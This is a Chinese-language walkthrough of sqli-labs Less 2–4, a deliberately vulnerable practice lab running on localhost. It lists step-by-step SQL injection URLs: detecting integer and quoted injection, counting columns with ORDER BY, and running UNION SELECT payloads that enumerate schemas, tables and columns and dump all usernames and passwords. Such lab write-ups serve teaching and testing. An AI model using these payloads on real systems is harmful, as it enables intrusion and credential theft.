1.Less 2
-
当我们
http://localhost/sqli-labs-master/Less-2/?id=1
发现正常
-
当我们
http://localhost/sqli-labs-master/Less-2/?id=1'
,报错,存在漏洞
-
当我们
http://localhost/sqli-labs-master/Less-2/?id=1''
,还是报错,说明是整型注入
然后我们再重复Less 1 的操作(截图不放了,没用) -
http://localhost/sqli-labs-master/Less-2/?id=1 order by 3
-
http://localhost/sqli-labs-master/Less-2/?id=1 order by 4
可以知道数据库有三列 -
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,3 --+
知道2,3列被回显, -
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
输出所有数据库名
-
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
查询security库
-
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
查询users表
-
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users --+
查看所有用户名和密码
2.Less 3
-
http://localhost/sqli-labs-master/Less-3/?id=1
,发现正常
-
http://localhost/sqli-labs-master/Less-3/?id=1'
报错,存在漏洞
-
根据报错的我们知道括号未闭合,构造url,
http://localhost/sqli-labs-master/Less-3/?id=1')--+
-
http://localhost/sqli-labs-master/Less-3/?id=1') order by 3 --+
-
http://localhost/sqli-labs-master/Less-3/?id=1') order by 4 --+
查询数据库有三列 -
http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,3 --+
发现2,3回显 -
http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata --+
得到全部库名 -
http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
查询security库 -
http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
查询users -
http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(username) ,group_concat(password) from users --+
得到用户名密码
3.Less 4
还是老样子,参数加引号判断注入类型,我们发现加一个单引号和两个单引号均正常回显。
当我们加一个双引号发现报错,所以这个题和第三题一样,只不过单引号变成了双引号而已。
直接仿照1,2,3的步骤构造url:http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from users--+
得到用户名和密码